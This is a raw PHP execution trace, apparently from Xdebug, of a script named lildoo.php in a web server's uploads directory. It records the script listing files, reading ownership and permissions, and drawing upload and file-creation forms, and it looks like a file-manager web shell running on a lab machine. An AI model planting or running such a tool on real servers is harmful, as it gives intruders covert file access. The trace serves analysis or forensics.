3		A						/var/www/html/uploads/lildoo.php	855	$path = '/var/www/html/uploads/.'
4	89	0	0.006615	795848	lstat	0		/var/www/html/uploads/lildoo.php	857	1	'/var/www/html/uploads/.'
4	89	1	0.006637	797624
4	89	R			[0 => 2049, 1 => 524471, 2 => 16895, 3 => 3, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676257694, 9 => 1676257694, 10 => 1676257694, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524471, 'mode' => 16895, 'nlink' => 3, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676257694, 'mtime' => 1676257694, 'ctime' => 1676257694, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/lildoo.php	857	$stat = [0 => 2049, 1 => 524471, 2 => 16895, 3 => 3, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676257694, 9 => 1676257694, 10 => 1676257694, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524471, 'mode' => 16895, 'nlink' => 3, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676257694, 'mtime' => 1676257694, 'ctime' => 1676257694, 'blksize' => 4096, 'blocks' => 8]
4	90	0	0.006715	796528	is_file	0		/var/www/html/uploads/lildoo.php	862	1	'/var/www/html/uploads/.'
4	90	1	0.006733	796552
4	90	R			FALSE
4	91	0	0.006751	796512	is_dir	0		/var/www/html/uploads/lildoo.php	863	1	'/var/www/html/uploads/.'
4	91	1	0.006768	796552
4	91	R			TRUE
4	92	0	0.006785	796512	is_link	0		/var/www/html/uploads/lildoo.php	864	1	'/var/www/html/uploads/.'
4	92	1	0.006802	796552
4	92	R			FALSE
4	93	0	0.006819	796512	is_readable	0		/var/www/html/uploads/lildoo.php	865	1	'/var/www/html/uploads/.'
4	93	1	0.006839	796552
4	93	R			TRUE
4	94	0	0.006856	796512	is_writable	0		/var/www/html/uploads/lildoo.php	866	1	'/var/www/html/uploads/.'
4	94	1	0.006876	796552
4	94	R			TRUE
4	95	0	0.006893	796512	filemtime	0		/var/www/html/uploads/lildoo.php	871	1	'/var/www/html/uploads/.'
4	95	1	0.006910	796552
4	95	R			1676257694
4	96	0	0.006930	796512	fileatime	0		/var/www/html/uploads/lildoo.php	872	1	'/var/www/html/uploads/.'
4	96	1	0.006967	796552
4	96	R			1676257694
4	97	0	0.006986	796512	filectime	0		/var/www/html/uploads/lildoo.php	873	1	'/var/www/html/uploads/.'
4	97	1	0.007002	796552
4	97	R			1676257694
3		A						/var/www/html/uploads/lildoo.php	873	$file = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694]
4	98	0	0.007053	796568	file_exists	0		/var/www/html/uploads/lildoo.php	877	1	'/var/www/html/uploads/./.'
4	98	1	0.007075	796608
4	98	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	877	$file['is_executable'] = TRUE
4	99	0	0.007108	796512	function_exists	0		/var/www/html/uploads/lildoo.php	888	1	'posix_getpwuid'
4	99	1	0.007126	796552
4	99	R			TRUE
4	100	0	0.007148	796512	posix_getpwuid	0		/var/www/html/uploads/lildoo.php	888	1	0
4	100	1	0.007179	797312
4	100	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	101	0	0.007209	797280	reset	0		/var/www/html/uploads/lildoo.php	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	101	1	0.007234	797688
4	101	R			'root'
3		A						/var/www/html/uploads/lildoo.php	888	$file['owner_name'] = 'root'
4	102	0	0.007267	796544	function_exists	0		/var/www/html/uploads/lildoo.php	889	1	'posix_getgrgid'
4	102	1	0.007285	796584
4	102	R			TRUE
4	103	0	0.007302	796544	posix_getgrgid	0		/var/www/html/uploads/lildoo.php	889	1	0
4	103	1	0.007330	797200
4	103	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	104	0	0.007356	797168	reset	0		/var/www/html/uploads/lildoo.php	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	104	1	0.007377	797576
4	104	R			'root'
3		A						/var/www/html/uploads/lildoo.php	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/lildoo.php	891	$files[] = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	105	0	0.007445	797216	readdir	0		/var/www/html/uploads/lildoo.php	853	1	resource(4) of type (stream)
4	105	1	0.007464	797296
4	105	R			'prepend.php'
3		A						/var/www/html/uploads/lildoo.php	853	$filename = 'prepend.php'
3		A						/var/www/html/uploads/lildoo.php	855	$path = '/var/www/html/uploads/prepend.php'
4	106	0	0.007511	797320	lstat	0		/var/www/html/uploads/lildoo.php	857	1	'/var/www/html/uploads/prepend.php'
4	106	1	0.007534	799128
4	106	R			[0 => 2049, 1 => 524474, 2 => 33261, 3 => 1, 4 => 0, 5 => 0, 6 => 0, 7 => 57, 8 => 1676257694, 9 => 1676257694, 10 => 1676257694, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524474, 'mode' => 33261, 'nlink' => 1, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 57, 'atime' => 1676257694, 'mtime' => 1676257694, 'ctime' => 1676257694, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/lildoo.php	857	$stat = [0 => 2049, 1 => 524474, 2 => 33261, 3 => 1, 4 => 0, 5 => 0, 6 => 0, 7 => 57, 8 => 1676257694, 9 => 1676257694, 10 => 1676257694, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524474, 'mode' => 33261, 'nlink' => 1, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 57, 'atime' => 1676257694, 'mtime' => 1676257694, 'ctime' => 1676257694, 'blksize' => 4096, 'blocks' => 8]
4	107	0	0.007613	798032	is_file	0		/var/www/html/uploads/lildoo.php	862	1	'/var/www/html/uploads/prepend.php'
4	107	1	0.007633	798088
4	107	R			TRUE
4	108	0	0.007650	798048	is_dir	0		/var/www/html/uploads/lildoo.php	863	1	'/var/www/html/uploads/prepend.php'
4	108	1	0.007668	798088
4	108	R			FALSE
4	109	0	0.007685	798048	is_link	0		/var/www/html/uploads/lildoo.php	864	1	'/var/www/html/uploads/prepend.php'
4	109	1	0.007702	798088
4	109	R			FALSE
4	110	0	0.007718	798048	is_readable	0		/var/www/html/uploads/lildoo.php	865	1	'/var/www/html/uploads/prepend.php'
4	110	1	0.007739	798088
4	110	R			TRUE
4	111	0	0.007756	798048	is_writable	0		/var/www/html/uploads/lildoo.php	866	1	'/var/www/html/uploads/prepend.php'
4	111	1	0.007776	798088
4	111	R			FALSE
4	112	0	0.007793	798048	filemtime	0		/var/www/html/uploads/lildoo.php	871	1	'/var/www/html/uploads/prepend.php'
4	112	1	0.007810	798088
4	112	R			1676257694
4	113	0	0.007827	798048	fileatime	0		/var/www/html/uploads/lildoo.php	872	1	'/var/www/html/uploads/prepend.php'
4	113	1	0.007843	798088
4	113	R			1676257694
4	114	0	0.007860	798048	filectime	0		/var/www/html/uploads/lildoo.php	873	1	'/var/www/html/uploads/prepend.php'
4	114	1	0.007877	798088
4	114	R			1676257694
3		A						/var/www/html/uploads/lildoo.php	873	$file = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694]
4	115	0	0.007927	798048	is_executable	0		/var/www/html/uploads/lildoo.php	880	1	'/var/www/html/uploads/prepend.php'
4	115	1	0.007947	798088
4	115	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	880	$file['is_executable'] = TRUE
4	116	0	0.007980	798048	function_exists	0		/var/www/html/uploads/lildoo.php	888	1	'posix_getpwuid'
4	116	1	0.007997	798088
4	116	R			TRUE
4	117	0	0.008014	798048	posix_getpwuid	0		/var/www/html/uploads/lildoo.php	888	1	0
4	117	1	0.008044	798848
4	117	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	118	0	0.008074	798816	reset	0		/var/www/html/uploads/lildoo.php	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	118	1	0.008105	799224
4	118	R			'root'
3		A						/var/www/html/uploads/lildoo.php	888	$file['owner_name'] = 'root'
4	119	0	0.008138	798080	function_exists	0		/var/www/html/uploads/lildoo.php	889	1	'posix_getgrgid'
4	119	1	0.008155	798120
4	119	R			TRUE
4	120	0	0.008172	798080	posix_getgrgid	0		/var/www/html/uploads/lildoo.php	889	1	0
4	120	1	0.008201	798736
4	120	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	121	0	0.008226	798704	reset	0		/var/www/html/uploads/lildoo.php	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	121	1	0.008248	799112
4	121	R			'root'
3		A						/var/www/html/uploads/lildoo.php	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/lildoo.php	891	$files[] = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	122	0	0.008317	798752	readdir	0		/var/www/html/uploads/lildoo.php	853	1	resource(4) of type (stream)
4	122	1	0.008335	798824
4	122	R			'data'
3		A						/var/www/html/uploads/lildoo.php	853	$filename = 'data'
3		A						/var/www/html/uploads/lildoo.php	855	$path = '/var/www/html/uploads/data'
4	123	0	0.008379	798840	lstat	0		/var/www/html/uploads/lildoo.php	857	1	'/var/www/html/uploads/data'
4	123	1	0.008400	800624
4	123	R			[0 => 2049, 1 => 524472, 2 => 16895, 3 => 2, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676257694, 9 => 1676257694, 10 => 1676257694, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524472, 'mode' => 16895, 'nlink' => 2, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676257694, 'mtime' => 1676257694, 'ctime' => 1676257694, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/lildoo.php	857	$stat = [0 => 2049, 1 => 524472, 2 => 16895, 3 => 2, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676257694, 9 => 1676257694, 10 => 1676257694, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524472, 'mode' => 16895, 'nlink' => 2, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676257694, 'mtime' => 1676257694, 'ctime' => 1676257694, 'blksize' => 4096, 'blocks' => 8]
4	124	0	0.008478	799528	is_file	0		/var/www/html/uploads/lildoo.php	862	1	'/var/www/html/uploads/data'
4	124	1	0.008498	799560
4	124	R			FALSE
4	125	0	0.008516	799520	is_dir	0		/var/www/html/uploads/lildoo.php	863	1	'/var/www/html/uploads/data'
4	125	1	0.008533	799560
4	125	R			TRUE
4	126	0	0.008550	799520	is_link	0		/var/www/html/uploads/lildoo.php	864	1	'/var/www/html/uploads/data'
4	126	1	0.008567	799560
4	126	R			FALSE
4	127	0	0.008584	799520	is_readable	0		/var/www/html/uploads/lildoo.php	865	1	'/var/www/html/uploads/data'
4	127	1	0.008604	799560
4	127	R			TRUE
4	128	0	0.008621	799520	is_writable	0		/var/www/html/uploads/lildoo.php	866	1	'/var/www/html/uploads/data'
4	128	1	0.008640	799560
4	128	R			TRUE
4	129	0	0.008657	799520	filemtime	0		/var/www/html/uploads/lildoo.php	871	1	'/var/www/html/uploads/data'
4	129	1	0.008674	799560
4	129	R			1676257694
4	130	0	0.008691	799520	fileatime	0		/var/www/html/uploads/lildoo.php	872	1	'/var/www/html/uploads/data'
4	130	1	0.008708	799560
4	130	R			1676257694
4	131	0	0.008725	799520	filectime	0		/var/www/html/uploads/lildoo.php	873	1	'/var/www/html/uploads/data'
4	131	1	0.008742	799560
4	131	R			1676257694
3		A						/var/www/html/uploads/lildoo.php	873	$file = ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694]
4	132	0	0.008793	799576	file_exists	0		/var/www/html/uploads/lildoo.php	877	1	'/var/www/html/uploads/data/.'
4	132	1	0.008813	799616
4	132	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	877	$file['is_executable'] = TRUE
4	133	0	0.008846	799520	function_exists	0		/var/www/html/uploads/lildoo.php	888	1	'posix_getpwuid'
4	133	1	0.008864	799560
4	133	R			TRUE
4	134	0	0.008880	799520	posix_getpwuid	0		/var/www/html/uploads/lildoo.php	888	1	0
4	134	1	0.008910	800320
4	134	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	135	0	0.008940	800288	reset	0		/var/www/html/uploads/lildoo.php	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	135	1	0.008966	800696
4	135	R			'root'
3		A						/var/www/html/uploads/lildoo.php	888	$file['owner_name'] = 'root'
4	136	0	0.008999	799552	function_exists	0		/var/www/html/uploads/lildoo.php	889	1	'posix_getgrgid'
4	136	1	0.009016	799592
4	136	R			TRUE
4	137	0	0.009033	799552	posix_getgrgid	0		/var/www/html/uploads/lildoo.php	889	1	0
4	137	1	0.009066	800208
4	137	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	138	0	0.009092	800176	reset	0		/var/www/html/uploads/lildoo.php	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	138	1	0.009114	800584
4	138	R			'root'
3		A						/var/www/html/uploads/lildoo.php	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/lildoo.php	891	$files[] = ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	139	0	0.009182	800224	readdir	0		/var/www/html/uploads/lildoo.php	853	1	resource(4) of type (stream)
4	139	1	0.009200	800304
4	139	R			'.htaccess'
3		A						/var/www/html/uploads/lildoo.php	853	$filename = '.htaccess'
3		A						/var/www/html/uploads/lildoo.php	855	$path = '/var/www/html/uploads/.htaccess'
4	140	0	0.009247	800320	lstat	0		/var/www/html/uploads/lildoo.php	857	1	'/var/www/html/uploads/.htaccess'
4	140	1	0.009269	802112
4	140	R			[0 => 2049, 1 => 524473, 2 => 33188, 3 => 1, 4 => 0, 5 => 0, 6 => 0, 7 => 64, 8 => 1676257694, 9 => 1676257694, 10 => 1676257694, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524473, 'mode' => 33188, 'nlink' => 1, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 64, 'atime' => 1676257694, 'mtime' => 1676257694, 'ctime' => 1676257694, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/lildoo.php	857	$stat = [0 => 2049, 1 => 524473, 2 => 33188, 3 => 1, 4 => 0, 5 => 0, 6 => 0, 7 => 64, 8 => 1676257694, 9 => 1676257694, 10 => 1676257694, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524473, 'mode' => 33188, 'nlink' => 1, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 64, 'atime' => 1676257694, 'mtime' => 1676257694, 'ctime' => 1676257694, 'blksize' => 4096, 'blocks' => 8]
4	141	0	0.009348	801016	is_file	0		/var/www/html/uploads/lildoo.php	862	1	'/var/www/html/uploads/.htaccess'
4	141	1	0.009368	801056
4	141	R			TRUE
4	142	0	0.009386	801016	is_dir	0		/var/www/html/uploads/lildoo.php	863	1	'/var/www/html/uploads/.htaccess'
4	142	1	0.009404	801056
4	142	R			FALSE
4	143	0	0.009422	801016	is_link	0		/var/www/html/uploads/lildoo.php	864	1	'/var/www/html/uploads/.htaccess'
4	143	1	0.009437	801056
4	143	R			FALSE
4	144	0	0.009452	801016	is_readable	0		/var/www/html/uploads/lildoo.php	865	1	'/var/www/html/uploads/.htaccess'
4	144	1	0.009469	801056
4	144	R			TRUE
4	145	0	0.009491	801016	is_writable	0		/var/www/html/uploads/lildoo.php	866	1	'/var/www/html/uploads/.htaccess'
4	145	1	0.009518	801056
4	145	R			FALSE
4	146	0	0.009545	801016	filemtime	0		/var/www/html/uploads/lildoo.php	871	1	'/var/www/html/uploads/.htaccess'
4	146	1	0.009568	801056
4	146	R			1676257694
4	147	0	0.009587	801016	fileatime	0		/var/www/html/uploads/lildoo.php	872	1	'/var/www/html/uploads/.htaccess'
4	147	1	0.009605	801056
4	147	R			1676257694
4	148	0	0.009629	801016	filectime	0		/var/www/html/uploads/lildoo.php	873	1	'/var/www/html/uploads/.htaccess'
4	148	1	0.009650	801056
4	148	R			1676257694
3		A						/var/www/html/uploads/lildoo.php	873	$file = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694]
4	149	0	0.009709	801016	is_executable	0		/var/www/html/uploads/lildoo.php	880	1	'/var/www/html/uploads/.htaccess'
4	149	1	0.009730	801056
4	149	R			FALSE
3		A						/var/www/html/uploads/lildoo.php	880	$file['is_executable'] = FALSE
4	150	0	0.009765	801016	function_exists	0		/var/www/html/uploads/lildoo.php	888	1	'posix_getpwuid'
4	150	1	0.009783	801056
4	150	R			TRUE
4	151	0	0.009800	801016	posix_getpwuid	0		/var/www/html/uploads/lildoo.php	888	1	0
4	151	1	0.009834	801816
4	151	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	152	0	0.009867	801784	reset	0		/var/www/html/uploads/lildoo.php	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	152	1	0.009889	802192
4	152	R			'root'
3		A						/var/www/html/uploads/lildoo.php	888	$file['owner_name'] = 'root'
4	153	0	0.009919	801048	function_exists	0		/var/www/html/uploads/lildoo.php	889	1	'posix_getgrgid'
4	153	1	0.010017	801088
4	153	R			TRUE
4	154	0	0.010036	801048	posix_getgrgid	0		/var/www/html/uploads/lildoo.php	889	1	0
4	154	1	0.010064	801704
4	154	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	155	0	0.010085	801672	reset	0		/var/www/html/uploads/lildoo.php	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	155	1	0.010102	802080
4	155	R			'root'
3		A						/var/www/html/uploads/lildoo.php	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/lildoo.php	891	$files[] = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4	156	0	0.010162	801720	readdir	0		/var/www/html/uploads/lildoo.php	853	1	resource(4) of type (stream)
4	156	1	0.010178	801760
4	156	R			FALSE
3		A						/var/www/html/uploads/lildoo.php	853	$filename = FALSE
3	52	1	0.010203	799968
3	52	R			[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
2		A						/var/www/html/uploads/lildoo.php	1186	$list = [0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
3	157	0	0.010348	799968	array_key_exists	0		/var/www/html/uploads/lildoo.php	1188	2	'sort'	[]
3	157	1	0.010363	800032
3	157	R			FALSE
2		A						/var/www/html/uploads/lildoo.php	1188	$sort = 'filename'
3	158	0	0.010388	799968	array_key_exists	0		/var/www/html/uploads/lildoo.php	1189	2	'reverse'	[]
3	158	1	0.010401	800032
3	158	R			FALSE
2		A						/var/www/html/uploads/lildoo.php	1189	$reverse = FALSE
3	159	0	0.010427	799968	directory_choice	1		/var/www/html/uploads/lildoo.php	1198	0
4	160	0	0.010442	800112	urlencode	0		/var/www/html/uploads/lildoo.php	1438	1	'/var/www/html/uploads/'
4	160	1	0.010456	800208
4	160	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4	161	0	0.010473	800144	word	1		/var/www/html/uploads/lildoo.php	1438	1	'directory'
5	162	0	0.010486	800168	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'Directory'	2	'UTF-8'
5	162	1	0.010503	800440
5	162	R			'Directory'
4	161	1	0.010518	800328
4	161	R			'Directory'
4	163	0	0.010532	800232	textfieldsize	1		/var/www/html/uploads/lildoo.php	1439	1	'/var/www/html/uploads/'
4		A						/var/www/html/uploads/lildoo.php	1575	$size = 27
4		A						/var/www/html/uploads/lildoo.php	1576	$size = 30
4	163	1	0.010567	800232
4	163	R			30
4	164	0	0.010580	800232	html	1		/var/www/html/uploads/lildoo.php	1439	1	'/var/www/html/uploads/'
5	165	0	0.010593	800232	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'/var/www/html/uploads/'	2	NULL
5	165	1	0.010608	800504
5	165	R			'/var/www/html/uploads/'
4	164	1	0.010623	800392
4	164	R			'/var/www/html/uploads/'
4	166	0	0.010637	800360	word	1		/var/www/html/uploads/lildoo.php	1440	1	'change'
5	167	0	0.010650	800360	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'change'	2	'UTF-8'
5	167	1	0.010664	800632
5	167	R			'change'
4	166	1	0.010678	800520
4	166	R			'change'
3	159	1	0.010692	800040
3	168	0	0.010700	800040	is_writable	0		/var/www/html/uploads/lildoo.php	1205	1	'/var/www/html/uploads/'
3	168	1	0.010717	800080
3	168	R			TRUE
3	169	0	0.010731	800040	upload_box	1		/var/www/html/uploads/lildoo.php	1206	0
4	170	0	0.010744	800104	word	1		/var/www/html/uploads/lildoo.php	1452	1	'file'
5	171	0	0.010757	800104	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'File'	2	'UTF-8'
5	171	1	0.010771	800376
5	171	R			'File'
4	170	1	0.010784	800264
4	170	R			'File'
4	172	0	0.010798	800232	word	1		/var/www/html/uploads/lildoo.php	1454	1	'upload'
5	173	0	0.010810	800232	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'upload'	2	'UTF-8'
5	173	1	0.010824	800504
5	173	R			'upload'
4	172	1	0.010838	800392
4	172	R			'upload'
3	169	1	0.010852	800040
3	174	0	0.010859	800040	create_box	1		/var/www/html/uploads/lildoo.php	1207	0
4	175	0	0.010870	800200	word	1		/var/www/html/uploads/lildoo.php	1467	1	'file'
